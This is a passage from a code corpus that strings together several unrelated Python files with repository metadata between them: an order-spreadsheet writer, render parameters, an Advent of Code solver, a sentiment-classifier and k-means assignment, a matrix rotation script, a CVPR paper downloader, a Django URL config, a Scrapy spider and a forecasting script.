        worksheet.write(row, 4, 'Article', cf["33"])
        worksheet.write(row, 5, 'Options', cf["33"])
        worksheet.write(row, 6, 'Poids', cf["33"])
        worksheet.write(row, 7, 'Prix u HT', cf["33"])
        worksheet.write(row, 8, 'Total TTC', cf["33"])
        row += 1
        col = 0
        list_prods = list(cmd.products.values())
        list_prods = sorted(list_prods, key=lambda k: k.brand_name)
        list_prods.append(list_prods.pop(0)) # delivery 'product' is last
        for prod in list_prods:
            worksheet.write(row, col, prod.quantity, cf["6"])
            worksheet.write(row, col + 1, " ", cf["2"])
            worksheet.write(row, col + 2, prod.get_best_reference(), cf["3"])
            worksheet.write(row, col + 3, prod.brand_name, cf["2"])
            # Highlight the delivery line itself for Mondial Relay orders.
            if livraison in prod.name and livraison == 'Mondial Relay':
                worksheet.write(row, col + 4, prod.name, cf["mondial"])
            else:
                worksheet.write(row, col + 4, prod.name, cf["2"])
            worksheet.write(row, col + 5, prod.get_options(), cf["7"])
            worksheet.write(row, col + 6, str(round(prod.weight, 3)) + 'kg', cf["2"])
            worksheet.write(row, col + 7, round(prod.final_price, 2), cf["2"])
            worksheet.write(row, col + 8, round(prod.taxed_price * prod.quantity, 2), cf["2"])
            row += 1
        # Totals block. The labels use 1-based A1 rows (row+3..row+5), the
        # values use 0-based indices (row+2..row+4) — so they do line up:
        # HT on sheet row row+3, TVA on row+4, TTC on row+5.
        worksheet.merge_range(f"F{str(row + 3)}:G{str(row + 3)}", "Total HT: ", cf["3"])
        worksheet.merge_range(f"F{str(row + 4)}:G{str(row + 4)}", "TVA: ", cf["3"])
        worksheet.merge_range(f"F{str(row + 5)}:G{str(row + 5)}", "Total TTC: ", cf["3"])
        worksheet.write(row + 2, 7, round(cmd.totalht, 2), cf["total"])
        worksheet.write(row + 4, 7, round(cmd.totalttc, 2), cf["total"])
        worksheet.write(row + 3, 7, round(cmd.totalttc - cmd.totalht, 2), cf["total"])
    workbook.close()
    logger.info("BonCommande.xlsx écrit")
    logger.new_formatter("newline")
"39167880+raphaelcjamarante@users.noreply.github.com"
] | 39167880+raphaelcjamarante@users.noreply.github.com |
755972aa028be820773f38450b919438ab7b3f28 | f6783bf89012c2bdf31f485e6841b4a38b2c0993 | /scenes_params.py | 8db1dbdb055937e033af5f1417517ed3fbabbe92 | [
"MIT"
] | permissive | Elfoniok/rendering_analysis | 4bbb923ae2ad2b8d6d31c8cf51dd8ca3a0147ac6 | c171f0a3b8f240ecbf457d3c806745b11552b9bc | refs/heads/master | 2021-04-18T19:03:36.759589 | 2018-07-06T09:17:57 | 2018-07-06T09:17:57 | 126,380,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,830 | py | import os
## ======================= ##
##
class RenderParams:
    """Per-scene rendering parameters, initialized to project-wide defaults."""

    ## ======================= ##
    ##
    def __init__(self):
        # Default output resolution.
        self.width = 800
        self.height = 600
        # Default sample range and step.
        self.start = 4225
        self.end = 6725
        self.step = 100
        # Default RNG seed and per-trial increment.
        self.seed = 100
        self.inc_seed = 0
params_map = dict()

# Per-scene overrides as (width, height, start, end); every other field
# keeps the RenderParams defaults.
_SCENE_OVERRIDES = {
    "barcelona": (800, 600, 5125, 8725),
    "bunkbed": (800, 600, 6025, 8225),
    "cat": (1600, 1200, 3825, 5825),
    "habitacion": (800, 600, 2825, 3325),
    "mug": (800, 600, 3825, 6325),
    "plushy": (400, 300, 4225, 6725),
    "sea": (800, 600, 825, 4025),
    "tree": (800, 600, 425, 2225),
}

for _scene, (_width, _height, _start, _end) in _SCENE_OVERRIDES.items():
    _params = RenderParams()
    _params.width = _width
    _params.height = _height
    _params.start = _start
    _params.end = _end
    params_map[_scene] = _params
## ======================= ##
##
def get_scene_name( path ):
    """Return the name of the directory that directly contains *path*."""
    parent_dir = os.path.dirname( path )
    return os.path.basename( parent_dir )
## ======================= ##
##
def get_scene_parameters( scene ):
    """Return the RenderParams registered for *scene*.

    Falls back to a fresh default RenderParams (with a notice) when the
    scene has no entry in params_map.
    """
    try:
        return params_map[ scene ]
    except KeyError:
        # Narrowed from a bare ``except:`` — only a missing scene should
        # trigger the default fallback; any other error must surface.
        print( "Parameters for scene: [" + scene + "] aren't defined. Using default values. " )
        return RenderParams()
## ======================= ##
##
def print_scene_parameters( params ):
    """Dump every field of a RenderParams object to stdout, one per line."""
    fields = [
        ("Width: ", params.width),
        ("Height ", params.height),
        ("Samples start: ", params.start),
        ("Samples end: ", params.end),
        ("Samples step: ", params.step),
        ("Seed: ", params.seed),
        ("Seed increment: ", params.inc_seed),
    ]
    for label, value in fields:
        print( label + str( value ) )
"nieznany.sprawiciel@gmail.com"
] | nieznany.sprawiciel@gmail.com |
3e132af42b28d60681b4833daf0ba15ff7a60097 | 4ddb1cb60794f75b7f72074fee6002f4f7367043 | /day19.py | b8f1decb99fde318e6c670671ffac858fd028ce3 | [] | no_license | shamayn/aoc2020 | 25032c84843e5ccb4472bb762ea88ab91b04f249 | 3a81253f0825180615d64dd6dae57a8a1ca9d28c | refs/heads/main | 2023-02-15T08:54:59.214285 | 2021-01-18T02:39:40 | 2021-01-18T02:39:40 | 330,533,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,538 | py | import re
# Sample rules/messages for part 1 (expected: 2 of the messages match rule 0).
TEST_RULES = [
    "0: 4 1 5",
    "1: 2 3 | 3 2",
    "2: 4 4 | 5 5",
    "3: 4 5 | 5 4",
    "4: \"a\"",
    "5: \"b\"",
    ]

TEST_INPUT = [
    "ababbb",
    "bababa",
    "abbbab",
    "aaabbb",
    "aaaabbb",
    ]

# Sample rules/messages for part 2, where rules 8 and 11 become recursive
# (expected: 12 matches after the rewrite in validateMessages2).
TEST_RULES_2 = [
    "42: 9 14 | 10 1",
    "9: 14 27 | 1 26",
    "10: 23 14 | 28 1",
    "1: \"a\"",
    "11: 42 31",
    "5: 1 14 | 15 1",
    "19: 14 1 | 14 14",
    "12: 24 14 | 19 1",
    "16: 15 1 | 14 14",
    "31: 14 17 | 1 13",
    "6: 14 14 | 1 14",
    "2: 1 24 | 14 4",
    "0: 8 11",
    "13: 14 3 | 1 12",
    "15: 1 | 14",
    "17: 14 2 | 1 7",
    "23: 25 1 | 22 14",
    "28: 16 1",
    "4: 1 1",
    "20: 14 14 | 1 15",
    "3: 5 14 | 16 1",
    "27: 1 6 | 14 18",
    "14: \"b\"",
    "21: 14 1 | 1 14",
    "25: 1 1 | 1 14",
    "22: 14 14",
    "8: 42",
    "26: 14 22 | 1 20",
    "18: 15 15",
    "7: 14 5 | 1 21",
    "24: 14 1",
    ]

TEST_INPUT_2 = [
    "abbbbbabbbaaaababbaabbbbabababbbabbbbbbabaaaa",
    "bbabbbbaabaabba",
    "babbbbaabbbbbabbbbbbaabaaabaaa",
    "aaabbbbbbaaaabaababaabababbabaaabbababababaaa",
    "bbbbbbbaaaabbbbaaabbabaaa",
    "bbbababbbbaaaaaaaabbababaaababaabab",
    "ababaaaaaabaaab",
    "ababaaaaabbbaba",
    "baabbaaaabbaaaababbaababb",
    "abbbbabbbbaaaababbbbbbaaaababb",
    "aaaaabbaabaaaaababaa",
    "aaaabbaaaabbaaa",
    "aaaabbaabbaaaaaaabbbabbbaaabbaabaaa",
    "babaaabbbaaabaababbaabababaaab",
    "aabbbbbaabbbaaaaaabbbbbababaaaaabbaaabba",
    ]
def validateMessages(rules, input):
    """Part 1: count how many messages fully match rule 0."""
    rule_map = parseRules(rules)
    print("rulesdict", rule_map)
    pattern = rulesToRegex(rule_map)
    print("regex", pattern)
    matched = sum(1 for message in input if pattern.match(message))
    print("sum", matched)
    return matched
def validateMessages2(rules, input):
    """Part 2: count matches after rules 8 and 11 become recursive.

    Rule 8 ("42 | 42 8") is exactly one-or-more 42s, expressed as ``(42)+``.
    Rule 11 ("42 31 | 42 11 31") is n 42s followed by n 31s; since the regex
    engine cannot express balanced repetition, it is unrolled as an
    alternation of the counts 1..9, which is enough for this input.
    """
    ruledict = parseRules(rules)
    ruledict["8"] = "(?: 42 )+".split()
    ruledict["11"] = ("(?: (?: (?: 42 ) {1} (?: 31 ) {1} ) | " \
                      + "(?: (?: 42 ) {2} (?: 31 ) {2} ) | " \
                      + "(?: (?: 42 ) {3} (?: 31 ) {3} ) | " \
                      + "(?: (?: 42 ) {4} (?: 31 ) {4} ) | " \
                      + "(?: (?: 42 ) {5} (?: 31 ) {5} ) | " \
                      + "(?: (?: 42 ) {6} (?: 31 ) {6} ) | " \
                      + "(?: (?: 42 ) {7} (?: 31 ) {7} ) | " \
                      + "(?: (?: 42 ) {8} (?: 31 ) {8} ) | " \
                      + "(?: (?: 42 ) {9} (?: 31 ) {9} ) )").split()
    print("updated", ruledict)
    regex = rulesToRegex(ruledict)
    print("regex", regex)
    sum = 0
    # bool(match) is 0 or 1, so this counts matching messages.
    for message in input:
        sum += bool(regex.match(message))
    print("sum", sum)
    return sum
def parseRules(rule_list):
    """Parse ``"id: body"`` rule lines into a dict of id -> token list.

    Literal rules like ``4: "a"`` lose their quotes; alternation rules
    (those containing ``|``) are wrapped in a non-capturing group so the
    tokens can later be joined directly into a regex.
    """
    ruledict = dict()
    for line in rule_list:
        key, value = line.strip().split(":")
        cleaned = value.replace("\"", "")
        if cleaned.find("|") > 0:
            cleaned = "(?: " + cleaned + " )"
        ruledict[key] = cleaned.split()
    return ruledict
def rulesToRegex(ruledict):
    """Expand rule "0" into a compiled, fully-anchored regex.

    Numeric tokens are repeatedly replaced in place by the token list of
    the rule they name, until only literals and regex syntax remain.
    """
    tokens = list(ruledict["0"])
    while True:
        digit_pos = next((i for i, tok in enumerate(tokens) if tok.isdigit()), None)
        if digit_pos is None:
            break
        tokens[digit_pos:digit_pos + 1] = list(ruledict[tokens[digit_pos]])
    return re.compile("".join(["^"] + tokens + ["$"]))
def testValidateMessages():
    """Sanity-check part 1 against the sample data (expected: 2 matches)."""
    expected = 2
    verdict = "Pass" if validateMessages(TEST_RULES, TEST_INPUT) == expected else "Fail"
    print("testValidateMessages " + verdict)
def testValidateMessages2():
    """Sanity-check part 2 against the sample data (expected: 12 matches)."""
    expected = 12
    verdict = "Pass" if validateMessages2(TEST_RULES_2, TEST_INPUT_2) == expected else "Fail"
    print("testValidateMessages2 " + verdict)
def main():
    """Read the puzzle input, split it into rules and messages, run part 2."""
    # testValidateMessages()
    # testValidateMessages2()
    # `with` closes the file handle; the original leaked it.
    with open('data/day19_input.txt', 'r') as f:
        lines = f.readlines()
    rules = []
    messages = []
    for line in lines:
        stripped = line.strip()
        if ":" in stripped:
            rules.append(stripped)
        elif stripped:
            # Skip blank separator lines; the original appended them as
            # empty-string "messages" (every raw line still ends in '\n',
            # so its len() check was always true).
            messages.append(stripped)
    # validateMessages(rules, messages)
    validateMessages2(rules, messages)


if __name__ == '__main__':
    main()
"shamayn@gmail.com"
] | shamayn@gmail.com |
7ea31f1d5cee13bb05992a54895bdc6027e86ed4 | 5deca81ecb729fdb1e14511b7fdb65e5f3b277de | /2_sentiment/submission_v3.py | 867249d65f4d33c72710ac1ca021d7e5f65d622c | [] | no_license | anatu/CS221-Fall2018 | 6a0e170ada7ba8794d9e93dee875fc1a072e4692 | 03dbcf7cb7da953877171b311be9d0e2aacec30c | refs/heads/master | 2021-03-20T06:01:52.122056 | 2020-03-14T00:22:10 | 2020-03-14T00:22:10 | 247,183,322 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,968 | py | #!/usr/bin/python
import random
import collections
import math
import sys
from util import *
############################################################
# Problem 3: binary classification
############################################################
############################################################
# Problem 3a: feature extraction
def extractWordFeatures(x):
    """
    Extract word features for a string x. Words are delimited by
    whitespace characters only.
    @param string x:
    @return dict: feature vector representation of x.
    Example: "I am what I am" --> {'I': 2, 'am': 2, 'what': 1}
    """
    # BEGIN_YOUR_CODE (our solution is 4 lines of code, but don't worry if you deviate from this)
    # Single pass over the words. The original called list.count() once per
    # unique word, which made the extractor O(n^2) in the number of words.
    features = dict()
    for word in x.split(" "):
        features[word] = features.get(word, 0) + 1
    return features
    # END_YOUR_CODE
############################################################
# Problem 3b: stochastic gradient descent
def learnPredictor(trainExamples, testExamples, featureExtractor, numIters, eta):
    '''
    Given |trainExamples| and |testExamples| (each one is a list of (x,y)
    pairs), a |featureExtractor| to apply to x, and the number of iterations to
    train |numIters|, the step size |eta|, return the weight vector (sparse
    feature vector) learned.

    You should implement stochastic gradient descent.

    Note: only use the trainExamples for training!
    You should call evaluatePredictor() on both trainExamples and testExamples
    to see how you're doing as you learn after each iteration.
    '''
    weights = {}  # feature => weight
    # BEGIN_YOUR_CODE (our solution is 12 lines of code, but don't worry if you deviate from this)
    for iteration in range(numIters):
        # print("BEGINNING RUN NUMBER %i" % (iteration))
        for example in trainExamples:
            # Extract the features from the input
            x = example[0]
            y = example[1]
            features = featureExtractor(x)
            # Calculate the hinge loss. score_product is the margin w.phi(x)*y;
            # only features present in `weights` contribute (missing keys are 0).
            score_product = (sum(weights[key]*features.get(key, 0) for key in weights))*y
            hingeLoss = max(0,1-score_product)  # computed for inspection only; not used below
            # print("Example: %s , Error: %i " % (x, hingeLoss))
            # Compute gradient vector based on value of the hinge loss.
            # Gradient of the hinge loss w.r.t. w is -phi(x)*y when the margin
            # is below 1, and 0 otherwise.
            if score_product < 1: # Equals phi*y if less than 1
                # NOTE: hingeGrad aliases `features` — the update() below
                # mutates the feature vector in place. Safe here only because
                # `features` is rebuilt fresh for every example.
                hingeGrad = features
                hingeGrad.update((a, b*-1*y) for a, b in features.items())
            else: # Zero otherwise
                hingeGrad = 0
            # Update only if the gradient is nonzero, otherwise
            # gradient descent cannot proceed
            if hingeGrad != 0:
                # SGD step: w <- w - eta * grad (i.e. w <- w + eta*y*phi(x)).
                for feature in hingeGrad.keys():
                    weights[feature] = weights.get(feature,0) - eta*hingeGrad.get(feature, 0)
    # END_YOUR_CODE
    return weights
############################################################
# Problem 3c: generate test case
def generateDataset(numExamples, weights):
    '''
    Return a set of examples (phi(x), y) randomly which are classified correctly by
    |weights|.
    '''
    random.seed(42)
    # Return a single example (phi(x), y).
    # phi(x) should be a dict whose keys are a subset of the keys in weights
    # and values can be anything (randomize!) with a nonzero score under the given weight vector.
    # y should be 1 or -1 as classified by the weight vector.
    def generateExample():
        # BEGIN_YOUR_CODE (our solution is 2 lines of code, but don't worry if you deviate from this)
        # The original skeleton left phi empty and `y` undefined (NameError).
        keys = list(weights.keys())
        while True:
            # Random non-empty subset of the weight keys, random values.
            phi = {k: random.uniform(-10, 10)
                   for k in random.sample(keys, random.randint(1, len(keys)))}
            score = sum(weights[k] * v for k, v in phi.items())
            if score != 0:  # re-draw in the (measure-zero) zero-score case
                break
        y = 1 if score > 0 else -1
        # END_YOUR_CODE
        return (phi, y)
    return [generateExample() for _ in range(numExamples)]
############################################################
# Problem 3e: character features
def extractCharacterFeatures(n):
    '''
    Return a function that takes a string |x| and returns a sparse feature
    vector consisting of all n-grams of |x| without spaces.
    EXAMPLE: (n = 3) "I like tacos" --> {'Ili': 1, 'lik': 1, 'ike': 1, ...
    You may assume that n >= 1.
    '''
    def extract(x):
        # BEGIN_YOUR_CODE (our solution is 6 lines of code, but don't worry if you deviate from this)
        # Preprocessing - ignore whitespace
        text = x.replace(" ", "")
        # All (overlapping) n-grams, in order of appearance.
        grams = ["".join(chars) for chars in zip(*[text[i:] for i in range(n)])]
        # Count every occurrence. The original used str.count(), which only
        # counts NON-overlapping matches and therefore undercounted
        # overlapping n-grams (e.g. "aa" appears 3 times in "aaaa", not 2).
        return dict(collections.Counter(grams))
        # END_YOUR_CODE
    return extract
############################################################
# Problem 4: k-means
############################################################
def kmeans(examples, K, maxIters):
    '''
    examples: list of examples, each example is a string-to-double dict representing a sparse vector.
    K: number of desired clusters. Assume that 0 < K <= |examples|.
    maxIters: maximum number of iterations to run (you should terminate early if the algorithm converges).
    Return: (length K list of cluster centroids,
            list of assignments (i.e. if examples[i] belongs to centers[j], then assignments[i] = j)
            final reconstruction loss)
    '''
    # BEGIN_YOUR_CODE (our solution is 32 lines of code, but don't worry if you deviate from this)
    # Rewritten: the previous version crashed at runtime (it indexed a dict
    # with an unhashable dict key via assmts_lookup[centroids[j]], appended a
    # leaked loop variable instead of examples[i], and accumulated the loss
    # terms incorrectly across iterations).
    def sq_dist(u, v):
        # Squared Euclidean distance between two sparse vectors.
        return sum((u.get(d, 0) - v.get(d, 0)) ** 2 for d in set(u) | set(v))

    random.seed(42)
    # Initialize with K distinct examples (copies, so centroid updates never
    # mutate the caller's data).
    centroids = [dict(ex) for ex in random.sample(examples, K)]
    assignments = [0] * len(examples)
    prev_assignments = None

    for _ in range(maxIters):
        # Step 1: assign every example to its nearest centroid.
        for i, example in enumerate(examples):
            assignments[i] = min(range(K), key=lambda j: sq_dist(example, centroids[j]))
        # Early exit once assignments stop changing (convergence).
        if assignments == prev_assignments:
            break
        prev_assignments = list(assignments)
        # Step 2: move each centroid to the mean of its assigned examples.
        for j in range(K):
            members = [examples[i] for i, a in enumerate(assignments) if a == j]
            if not members:
                continue  # keep the old centroid for an empty cluster
            totals = {}
            for member in members:
                for d, value in member.items():
                    totals[d] = totals.get(d, 0) + value
            centroids[j] = {d: value / len(members) for d, value in totals.items()}

    # Final reconstruction loss: total squared distance to assigned centroids.
    loss = sum(sq_dist(examples[i], centroids[assignments[i]])
               for i in range(len(examples)))
    return centroids, assignments, loss
    # END_YOUR_CODE
| [
"natu.anand@gmail.com"
] | natu.anand@gmail.com |
34e92db0841af367e4b0346a4077887143c981bd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p00002/s447243661.py | ec5ea4eb25e8b12e086a6e676b80ee789fd3efbc | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | import sys
# For each stdin line of space-separated integers, print how many digits
# their sum has. Rewritten as a plain loop: the original abused a list
# comprehension purely for its side effects, building a throwaway list.
for line in sys.stdin:
    digit_sum = sum(int(token) for token in line.split(" "))
    print(len(str(digit_sum)))
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d6a79a4eabf06bb6b8ca355714e38bdeb0e5ebdd | 59e94c298797d6fa47f22a616ca21ae88d9cd576 | /pgm3.py | c04e50f01c50cefdb247d5193d581eab54317082 | [] | no_license | renisha2898/PythonTraining | e08c70b09f3abacd6e7bd09564608d28476a3570 | 48e352bbdaa3af4d8d0043603cac777de06f3df0 | refs/heads/master | 2023-04-11T21:00:50.139206 | 2021-05-06T14:30:17 | 2021-05-06T14:30:17 | 364,862,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 959 | py | def print_matrix(mat):
for i in range (len(mat)):
for j in range (len(mat)):
print(str(mat[i][j]), end = " ")
print()
def transpose_matrix(mat):
    """Transpose a square matrix in place by swapping across the diagonal."""
    size = len(mat)
    for r in range(size):
        # Only the strict upper triangle needs swapping; the diagonal is fixed.
        for c in range(r + 1, size):
            mat[r][c], mat[c][r] = mat[c][r], mat[r][c]
def reverse_rows(mat):
    """Reverse every row of mat in place (horizontal flip).

    The original two-pointer loop decremented its right index ``k`` inside a
    fixed ``for j in range(0, k)``, so on even-sized matrices the indices
    crossed and the later iterations undid the earlier swaps (e.g.
    [1,2,3,4] ended up as [4,2,3,1]). ``list.reverse`` is correct and O(n).
    """
    for row in mat:
        row.reverse()
def reverse_columns(mat):
    """Reverse every column of mat in place (vertical flip).

    Fixes the original loop, which decremented its bottom index inside a
    fixed ``range`` and therefore re-swapped rows on even-sized matrices.
    Reversing each column is equivalent to reversing the row order, which
    can be done with whole-row swaps.
    """
    top, bottom = 0, len(mat) - 1
    while top < bottom:
        mat[top], mat[bottom] = mat[bottom], mat[top]
        top += 1
        bottom -= 1
if __name__ == '__main__':
    # Rotate a 3x3 matrix 90 degrees anticlockwise:
    # transpose, then reverse each column (vertical flip).
    matrix = [[1, 2, 3],
              [4, 5, 6],
              [7, 8, 9]]
    print_matrix(matrix)
    transpose_matrix(matrix)
    #reverse_rows(matrix) would give the clockwise rotation instead
    reverse_columns(matrix)  # (for Anticlockwise rotation)
    print("\nThe array after rotation is ")
    print_matrix(matrix)
| [
"renisha.barnes22309@gmail.com"
] | renisha.barnes22309@gmail.com |
a7ab71ff7fc64ee39fb77ab6387a4743f11aebc9 | 7f86ec2cb6cf59e8a70ac2855b6e073adad8ec5a | /cvpr_crawler.py | 69351ae13ef9099fd9fdc910a724958697154184 | [] | no_license | wangjuenew/CVPR2019 | 3e52dd37eea9ef99c796ba1c1676f4f3b5705255 | f6777150bab76c67245c63afad25c6b9b2819fc1 | refs/heads/master | 2020-06-05T14:44:16.401270 | 2019-06-11T07:34:15 | 2019-06-11T07:34:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | import requests
from bs4 import BeautifulSoup
import os
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
}
url="http://openaccess.thecvf.com/CVPR2019.py"
html=requests.get(url)
soup=BeautifulSoup(html.content)
soup.a.contents=='pdf'
pdfs=soup.findAll(name="a",text="pdf")
if not os.path.exists('./CVPR2019/'):
os.mkdir('./CVPR2019/')
folder_path='./CVPR2019/'
for i,pdf in enumerate(pdfs):
pdf_name=pdf["href"].split('/')[-1]
c=requests.get('http://openaccess.thecvf.com/'+pdf['href'],headers=headers).content
with open(folder_path+pdf_name,mode="wb") as f:
f.write(c)
print('['+str(i)+']'+pdf_name+" finish")
| [
"noreply@github.com"
] | noreply@github.com |
f22e73da9c3bc06e6fbce6048458ec5cce2dbf73 | 77d4bedc8e58083e523b600a04efc1d7b990ad5e | /goods/goods/spiders/jiazhuangpei.py | cb2910f3e3d1dee7a6acb758d6ac44a07d5cd875 | [] | no_license | Yongest/spider | 7ef42675f4680fd86ad0e9b3a7ee97c51ad022a5 | aae715dc1793d70326679e4e0766f813d2932ef5 | refs/heads/main | 2023-06-04T20:53:43.989894 | 2021-06-23T10:07:45 | 2021-06-23T10:07:45 | 357,281,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | import scrapy
class JiazhuangpeiSpider(scrapy.Spider):
    """Scrapy spider for the combo listing page of jiazhuangpei.com."""

    name = 'jiazhuangpei'
    allowed_domains = ['jiazhuangpei.com']
    start_urls = ['https://www.jiazhuangpei.com/combo/combo_list?type_id=1&page=1']
    # Debug marker: runs once, when the class body is executed at import time.
    print('start')

    def parse(self, response):
        """Debug callback: dump every <div> node found in the response."""
        print(22)
        div_nodes = response.xpath('//*/div')
        print(div_nodes)
| [
"1046788379@qq.com"
] | 1046788379@qq.com |
29508b8c62c4dfc7ece26c6ae621b64c84e7d5da | 1368e2beda67052140a51fd53eb7a12941124320 | /Python 3/1541.py | 72fe04dada81de5994973cd36cbc76aecd070127 | [] | no_license | matheuskolln/URI | ac540fd4ea18c9b3ba853492dc60157c165145cf | b9091ed1c5b75af79cb25827aff8aab99d2e4b65 | refs/heads/master | 2023-03-09T23:17:17.865447 | 2021-02-25T16:47:24 | 2021-02-25T16:47:24 | 272,043,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | while True:
n = [int(x) for x in input().split(' ')]
if n[0] == 0:
break
a = n[0] * n[1]
i = 0
while i * i * n[2] / 100 <= a:
i += 1
print(i - 1) | [
"matheuzhenrik@gmail.com"
] | matheuzhenrik@gmail.com |
de86bd936a9bc7afa59da85369c6a2c0b220a168 | f8ffa8ff257266df3de9d20d95b291e393f88434 | /Python from scratch/Zadania/zadania podczas zajęć/zajęcia11/zadanie01/zadanie01+a.py | ac892bb38f756545548af1328c3d3f7cef2f15c5 | [] | no_license | janiszewskibartlomiej/Python_Code_Me_Gda | c0583c068ef08b6130398ddf93c3a3d1a843b487 | 7568de2a9acf80bab1429bb55bafd89daad9b729 | refs/heads/master | 2020-03-30T05:06:26.757033 | 2020-03-02T08:53:28 | 2020-03-02T08:53:28 | 150,781,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | from datetime import datetime
# Ask for a celebrity's birth date and report their age in whole years.
birth_input = input('Wprowadź datę urodzin celebryty w formacie [RRRR-MM-DD]:')
try:
    birth_date = datetime.strptime(birth_input, '%Y-%m-%d')
except ValueError:
    print('Wprowadzono nie prawiłowe dane!')
    exit()
age_delta = datetime.now() - birth_date
# Approximate years as days // 365 (ignores leap days), as before.
print('Wiek celebryty to:', age_delta.days // 365)
| [
"janiszewski.bartlomiej@gmail.com"
] | janiszewski.bartlomiej@gmail.com |
9f594ff1823619e1dcc2332a99bfe096916918e4 | 46d99d9323e76d621ca96267a110ad504862b3ae | /oauth2discord/oauth2discord/urls.py | d0d031dc18f0be1182806830b8496f5fab51af8b | [] | no_license | stuyy/django-discord-oauth2 | 532671b9d96fd51aea95baff97edea3c51a45080 | 990f2a92151f1bbe90dfcb5ca05fdb16afbebefc | refs/heads/master | 2023-02-06T01:25:20.436809 | 2020-12-23T13:43:12 | 2020-12-23T13:43:12 | 323,912,487 | 8 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,079 | py | """oauth2discord URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from discordlogin import views
urlpatterns = [
path('admin/', admin.site.urls),
path('auth/user', views.get_authenticated_user, name='get_authenticated_user'),
path('oauth2', views.home, name='oauth2'),
path('oauth2/login', views.discord_login, name='oauth_login'),
path('oauth2/login/redirect', views.discord_login_redirect, name='discord_login_redirect')
]
| [
"ansontheprogrammer@gmail.com"
] | ansontheprogrammer@gmail.com |
0e17514ae9c3a31e17cccfa8e0dddb6f3ce2a800 | 33648419977a4fba65b759eb3a2a974403298340 | /double_lens/dependencies.py | c2aab79bcd0146e47ddd160e3b09961bac6aeb2f | [] | no_license | Andrew-wi/magnetic_lens | 3c3cbd2c5b821f4f43d7b562afbab6610f3d9608 | efe51168018c5e4c9c2055416dc47c3694af448b | refs/heads/master | 2023-05-23T10:00:08.998982 | 2021-06-15T18:05:32 | 2021-06-15T18:05:32 | 262,870,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,274 | py | # ----------------------------------------------------------------------------
# Dependencies
# ----------------------------------------------------------------------------
print('Importing dependencies...')
import csv
import datetime
import gc
import matplotlib.pyplot as plt
import matplotlib.path as pltPath
import math
import numpy as np
from astropy.io import fits
from mpl_toolkits import mplot3d
from pathlib import Path
# from scipy.stats import maxwell
n = 1e4
t = 0.0
sigma_xy = 0.0042
sigma_vxy = 12.0
sigma_vz = 30.0
mu_vz = 100.0
l_cell_to_4k = 0.1
l_4k_to_lens_aperture = 0.05 # origin is at l_cell_to_4k. Can be negative to scan behind the 4k
l_4k_to_lens_aperture_2 = 0.08 # as above
l_4k_to_beam_shutter = 0.26
m_s = 0.5
g = 2.0
mu_B = 9.274e-24
mass = 9.48671e-26 # caoh mass # 1.18084e-25 # caoch3 mass
t_final = 0.01
steps = 3000
mot_left_edge = 0.6700
mot_side_length = 0.01
# parameter scan variables
lens_range = 0.5 # range of values over which we scan the lens. Origin is at l_4k_to_lens_aperture
scan_points = 9 # number of points to scan
trials = 12 # number of trials at each scan_point
# same as in mathematica code
m = 200 # mesh spacing
R = 25.4 # outer radius of lens (in mm, as Radia is in mm by default)
segs = 12 # number of segments
| [
"andrew.winnicki.sc@gmail.com"
] | andrew.winnicki.sc@gmail.com |
79ea37acde76ff9d7597da6fefc1e622c6d6b78f | d51655c40bf6ccb6a1d380ad9a41787c39c0dd73 | /01_simple_forecast.py | 41ce5d89994d1b5b4bdddae9012dbfc12cf90205 | [] | no_license | andydong1209/TaipeiUniv | afda0cea0c099220ad2bf476b43f3c70f7cfeeb5 | 850e91c7ce536218a9363c9e533aeb28be4a4595 | refs/heads/master | 2020-04-09T08:47:46.540602 | 2018-12-03T15:04:43 | 2018-12-03T15:04:43 | 160,208,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,334 | py | # persistence forecast for monthly car sales dataset
from math import sqrt
from numpy import median
from numpy import mean
from numpy import std
from pandas import read_csv
from sklearn.metrics import mean_squared_error
from matplotlib import pyplot
# split a univariate dataset into train/test sets
def train_test_split(data, n_test):
return data[:-n_test], data[-n_test:]
# root mean squared error or rmse
def measure_rmse(actual, predicted):
return sqrt(mean_squared_error(actual, predicted))
# difference dataset
def difference(data, interval):
return [data[i] - data[i - interval] for i in range(interval, len(data))]
# fit a model
def model_fit(train, config):
return None
# forecast with a pre-fit model
def model_predict(model, history, config):
values = list()
for offset in config:
values.append(history[-offset])
return median(values)
# walk-forward validation for univariate data
def walk_forward_validation(data, n_test, cfg):
predictions = list()
# split dataset
train, test = train_test_split(data, n_test)
# fit model
model = model_fit(train, cfg)
# seed history with training dataset
history = [x for x in train]
# step over each time-step in the test set
for i in range(len(test)):
# fit model and make forecast for history
yhat = model_predict(model, history, cfg)
# store forecast in list of predictions
predictions.append(yhat)
# add actual observation to history for the next loop
history.append(test[i])
# estimate prediction error
error = measure_rmse(test, predictions)
print(' > %.3f' % error)
